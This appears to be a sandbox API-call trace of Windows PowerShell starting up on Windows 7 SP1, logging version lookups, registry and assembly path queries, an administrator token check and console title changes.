	[0465.518] VerQueryValueW (in: pBlock=0x2bc41a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14daf8, puLen=0x14daf0 | out: lplpBuffer=0x14daf8*=0x2bc4570, puLen=0x14daf0) returned 1
	[0465.518] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0465.518] CoTaskMemAlloc (cb=0x58) returned 0x390d30
	[0465.518] lstrcpyW (in: lpString1=0x390d30, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0465.518] CoTaskMemFree (pv=0x390d30) 
	[0465.518] VerQueryValueW (in: pBlock=0x2bc41a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14daf8, puLen=0x14daf0 | out: lplpBuffer=0x14daf8*=0x2bc45ec, puLen=0x14daf0) returned 1
	[0465.518] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0465.519] CoTaskMemAlloc (cb=0x20) returned 0x3c2730
	[0465.519] lstrcpyW (in: lpString1=0x3c2730, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0465.519] CoTaskMemFree (pv=0x3c2730) 
	[0465.519] VerQueryValueW (in: pBlock=0x2bc41a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14daf8, puLen=0x14daf0 | out: lplpBuffer=0x14daf8*=0x2bc4294, puLen=0x14daf0) returned 1
	[0465.519] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0465.519] CoTaskMemAlloc (cb=0x66) returned 0x3c1960
	[0465.519] lstrcpyW (in: lpString1=0x3c1960, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0465.519] CoTaskMemFree (pv=0x3c1960) 
	[0465.519] VerQueryValueW (in: pBlock=0x2bc41a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14daf8, puLen=0x14daf0 | out: lplpBuffer=0x14daf8*=0x0, puLen=0x14daf0) returned 0
	[0465.519] VerQueryValueW (in: pBlock=0x2bc41a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14daf8, puLen=0x14daf0 | out: lplpBuffer=0x14daf8*=0x0, puLen=0x14daf0) returned 0
	[0465.519] VerQueryValueW (in: pBlock=0x2bc41a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14daf8, puLen=0x14daf0 | out: lplpBuffer=0x14daf8*=0x0, puLen=0x14daf0) returned 0
	[0465.519] VerQueryValueW (in: pBlock=0x2bc41a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14dac8, puLen=0x14dac0 | out: lplpBuffer=0x14dac8*=0x2bc423c, puLen=0x14dac0) returned 1
	[0465.519] CoTaskMemAlloc (cb=0x204) returned 0x3c9e30
	[0465.519] VerLanguageNameW (in: wLang=0x0, szLang=0x3c9e30, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0465.520] CoTaskMemFree (pv=0x3c9e30) 
	[0465.520] VerQueryValueW (in: pBlock=0x2bc41a0, lpSubBlock="\\", lplpBuffer=0x14db18, puLen=0x14db10 | out: lplpBuffer=0x14db18*=0x2bc41c8, puLen=0x14db10) returned 1
	[0466.042] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0466.042] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0466.043] CoTaskMemFree (pv=0x3ad740) 
	[0466.047] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0466.047] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0466.047] CoTaskMemFree (pv=0x3ad740) 
	[0466.052] lstrlenW (lpString="䅁") returned 1
	[0466.061] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d9e8 | out: phkResult=0x14d9e8*=0x2f8) returned 0x0
	[0466.063] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d9d8 | out: phkResult=0x14d9d8*=0x2fc) returned 0x0
	[0466.063] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14da68 | out: phkResult=0x14da68*=0x300) returned 0x0
	[0466.067] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d9ac, lpData=0x0, lpcbData=0x14d9a8*=0x0 | out: lpType=0x14d9ac*=0x1, lpData=0x0, lpcbData=0x14d9a8*=0x56) returned 0x0
	[0466.068] CoTaskMemAlloc (cb=0x5a) returned 0x3c18f0
	[0466.068] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d97c, lpData=0x3c18f0, lpcbData=0x14d978*=0x56 | out: lpType=0x14d97c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d978*=0x56) returned 0x0
	[0466.068] CoTaskMemFree (pv=0x3c18f0) 
	[0466.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0466.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0466.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0466.642] CoTaskMemAlloc (cb=0x104) returned 0x3ad740
	[0466.642] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0466.642] CoTaskMemFree (pv=0x3ad740) 
	[0469.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0469.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0469.971] CoTaskMemAlloc (cb=0x104) returned 0x3ad850
	[0469.971] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad850, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0469.971] CoTaskMemFree (pv=0x3ad850) 
	[0469.972] CoTaskMemAlloc (cb=0x104) returned 0x3ad850
	[0469.972] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad850, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0469.972] CoTaskMemFree (pv=0x3ad850) 
	[0470.289] CoTaskMemAlloc (cb=0x104) returned 0x3ad850
	[0470.289] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad850, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0470.289] CoTaskMemFree (pv=0x3ad850) 
	[0470.291] CoTaskMemAlloc (cb=0x104) returned 0x3ad850
	[0470.291] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad850, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0470.291] CoTaskMemFree (pv=0x3ad850) 
	[0470.292] CoTaskMemAlloc (cb=0x104) returned 0x3ad850
	[0470.292] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad850, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0470.292] CoTaskMemFree (pv=0x3ad850) 
	[0472.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0472.271] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0472.292] CoTaskMemAlloc (cb=0x104) returned 0x3ad850
	[0472.292] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad850, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0472.292] CoTaskMemFree (pv=0x3ad850) 
	[0472.295] CoTaskMemAlloc (cb=0x104) returned 0x3ad850
	[0472.296] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ad850, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0472.296] CoTaskMemFree (pv=0x3ad850) 
	[0474.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0474.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0479.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0479.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0480.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0480.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0484.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0484.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0486.774] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0486.774] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0486.774] CoTaskMemFree (pv=0x3ada70) 
	[0486.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0486.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0486.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0488.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x14d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0488.380] SetErrorMode (uMode=0x1) returned 0x1
	[0488.380] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x14d940 | out: lpFileInformation=0x14d940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0488.381] SetErrorMode (uMode=0x1) returned 0x1
	[0490.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0490.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0490.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0490.188] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0490.188] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0490.188] CoTaskMemFree (pv=0x3ada70) 
	[0490.191] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0490.191] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0490.192] CoTaskMemFree (pv=0x3ada70) 
	[0490.192] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0490.192] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0490.192] CoTaskMemFree (pv=0x3ada70) 
	[0490.195] CoCreateGuid (in: pguid=0x14dd08 | out: pguid=0x14dd08*(Data1=0x79b345b5, Data2=0xdd7f, Data3=0x4828, Data4=([0]=0xaf, [1]=0xf0, [2]=0xc7, [3]=0xc9, [4]=0xbc, [5]=0x6, [6]=0x45, [7]=0x16))) returned 0x0
	[0490.198] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0490.198] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0490.198] CoTaskMemFree (pv=0x3ada70) 
	[0490.201] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0490.201] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0490.201] CoTaskMemFree (pv=0x3ada70) 
	[0490.969] CoTaskMemAlloc (cb=0x104) returned 0x3ada70
	[0490.969] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3ada70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0490.969] CoTaskMemFree (pv=0x3ada70) 
	[0490.977] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0490.978] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x14d9b0 | out: lpConsoleScreenBufferInfo=0x14d9b0) returned 1
	[0490.989] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0490.990] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x14d9b0 | out: lpConsoleScreenBufferInfo=0x14d9b0) returned 1
	[0490.991] GetVersionExW (in: lpVersionInformation=0x14d940*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14d940*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0490.999] GetCurrentProcess () returned 0xffffffffffffffff
	[0491.000] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x14d9d8 | out: TokenHandle=0x14d9d8*=0x1c8) returned 1
	[0491.004] GetTokenInformation (in: TokenHandle=0x1c8, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14d8f8 | out: TokenInformation=0x0, ReturnLength=0x14d8f8) returned 0
	[0491.005] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x337290
	[0491.005] GetTokenInformation (in: TokenHandle=0x1c8, TokenInformationClass=0x8, TokenInformation=0x337290, TokenInformationLength=0x4, ReturnLength=0x14d8f8 | out: TokenInformation=0x337290, ReturnLength=0x14d8f8) returned 1
	[0491.005] DuplicateTokenEx (in: hExistingToken=0x1c8, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x14da58 | out: phNewToken=0x14da58*=0x1c0) returned 1
	[0491.006] GetTokenInformation (in: TokenHandle=0x1c8, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14d8f8 | out: TokenInformation=0x0, ReturnLength=0x14d8f8) returned 0
	[0491.006] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3372c0
	[0491.006] GetTokenInformation (in: TokenHandle=0x1c8, TokenInformationClass=0x8, TokenInformation=0x3372c0, TokenInformationLength=0x4, ReturnLength=0x14d8f8 | out: TokenInformation=0x3372c0, ReturnLength=0x14d8f8) returned 1
	[0491.006] CheckTokenMembership (in: TokenHandle=0x1c0, SidToCheck=0x2c9ef48*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x14da68 | out: IsMember=0x14da68) returned 1
	[0491.006] CloseHandle (hObject=0x1c0) returned 1
	[0491.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0491.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0491.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0491.683] CoTaskMemAlloc (cb=0x804) returned 0x3ef460
	[0491.683] GetConsoleTitleW (in: lpConsoleTitle=0x3ef460, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0491.683] CoTaskMemFree (pv=0x3ef460) 
	[0492.458] CoTaskMemAlloc (cb=0x804) returned 0x1b953080
	[0492.458] GetConsoleTitleW (in: lpConsoleTitle=0x1b953080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0492.459] CoTaskMemFree (pv=0x1b953080) 
	[0492.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0492.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0492.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0492.461] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0493.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
